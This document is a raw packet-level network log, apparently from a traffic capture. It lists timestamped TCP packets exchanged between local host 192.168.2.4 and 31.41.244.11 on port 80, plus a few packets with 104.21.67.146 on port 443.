Dec 22, 2024 02:16:37.904572964 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.006500959 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.006552935 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.006625891 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.006627083 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.007885933 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.007937908 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.007951975 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.007994890 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.011259079 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.011360884 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.011379957 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.011466026 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.014204025 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.014262915 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.014370918 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.014370918 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.017549038 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.017600060 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.017746925 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.017748117 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.020656109 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.020693064 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.020848036 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.020848036 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.023565054 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.023664951 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.023812056 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.023812056 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.026571989 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.026608944 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.026659012 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.026659966 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.029581070 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.029628038 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.029648066 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.029681921 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.032284021 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.032434940 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.032522917 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.032524109 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.034665108 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.034699917 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.034723997 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.034755945 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.038316965 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.038362980 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.038408995 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.038408995 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.040091991 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.040164948 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.040244102 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.040244102 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.042963028 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.043064117 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.043070078 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.043147087 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.045911074 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.045965910 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.046046972 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.046046972 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.048809052 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.048880100 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.049046993 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.049047947 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.051768064 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.051945925 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.051976919 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.052032948 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.054563999 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.054774046 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.054972887 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.055042982 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.057473898 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.057533979 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.057542086 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.057588100 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.061355114 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.061397076 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.061445951 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.061445951 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.064188957 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.064404011 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.064639091 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.064817905 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.067265034 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.067305088 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.067363977 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.067363977 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.069987059 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.070139885 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.070219994 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.070219994 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.072968960 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.073004961 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.073041916 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.073075056 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.076250076 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.076303005 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.076317072 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.076342106 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.078902006 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.078957081 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.078974009 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.079000950 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.081701994 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.081789970 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.081878901 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.081878901 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.084561110 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.084635973 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.084717989 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.084779024 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.087460995 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.087580919 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.087683916 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.087685108 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.090346098 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.090380907 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.090444088 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.090444088 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.093328953 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.093364000 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.093398094 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.093492031 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.096170902 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.096205950 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.096400976 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.096401930 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.099417925 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.099486113 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.099797010 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.099852085 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.101783037 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.101840973 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.101927996 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.101984978 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.104955912 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.104990005 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.105179071 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.105180025 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.107806921 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.107889891 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.107928038 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.107991934 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.110644102 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.110680103 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.110724926 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.110797882 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.113801003 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.113856077 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.114012957 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.114012957 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.116679907 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.116718054 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.116899014 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.116899014 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.119424105 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.119497061 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.119501114 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.119577885 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.122411013 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.122462988 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.122626066 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.122626066 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.190278053 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.190321922 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.190505028 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.190505981 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.190931082 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.190983057 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.191111088 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.191111088 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.193371058 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.193449020 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.193528891 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.193583012 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.195286989 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.195378065 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.195403099 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.195470095 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.197793961 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.197858095 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.197900057 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.197953939 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.200313091 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.200351000 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.200407028 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.200437069 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.202711105 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.202841043 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.202847004 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.202925920 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.205106974 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.205205917 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.205291033 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.205497026 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.207436085 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.207506895 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.207536936 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.207592010 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.209798098 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.209870100 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.209906101 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.209976912 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.211993933 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.212064981 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.212096930 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.212167978 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.214221954 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.214294910 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.214330912 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.214376926 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.216654062 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.216707945 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.216710091 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.216759920 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.218641996 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.218708038 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.218727112 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.218801975 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.219763041 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.219849110 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.219897985 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.219908953 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.219930887 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.219973087 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.220082045 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.220690012 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.220751047 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.220801115 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.220856905 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.222817898 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.222929955 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.222944975 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.222991943 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.225152969 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.225207090 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.225229979 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.225255013 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.226948023 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.227020025 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.227058887 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.227107048 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.228957891 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.229022026 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.229079962 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.229135036 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.230979919 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.231040955 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.231100082 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.231163979 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.233064890 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.233174086 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.233187914 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.233247042 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.234644890 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.234693050 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.234703064 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.234942913 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.235002995 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.235065937 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.235126019 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.236911058 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.236978054 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.237036943 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.237093925 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.238938093 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.238992929 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.239037037 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.239099979 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.240796089 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.240853071 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.240866899 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.240927935 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.242671967 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.242731094 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.242800951 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.242866039 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.243007898 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.243053913 CET	49831	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:38.243062019 CET	443	49831	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:38.244599104 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.244667053 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.244709969 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.244769096 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.246479988 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.246532917 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.246540070 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.246589899 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.248367071 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.248420000 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.248424053 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.248477936 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.250227928 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.250284910 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.250348091 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.250403881 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.252079010 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.252131939 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.252187014 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.252238989 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.254004002 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.254103899 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.254105091 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.254168987 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.255795956 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.255850077 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.255920887 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.255970001 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.257697105 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.257766962 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.257807016 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.257877111 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.259532928 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.259592056 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.259661913 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.259738922 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.261385918 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.261447906 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.261487961 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.261542082 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.263252020 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.263329029 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.263384104 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.263441086 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.265149117 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.265258074 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.265259027 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.265316963 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.266966105 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.267024040 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.267077923 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.267131090 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.268830061 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.268891096 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.268956900 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.269020081 CET	49830	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:38.270687103 CET	80	49830	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:38.270741940 CET	80	49830	31.41.244.11	192.168.2.4
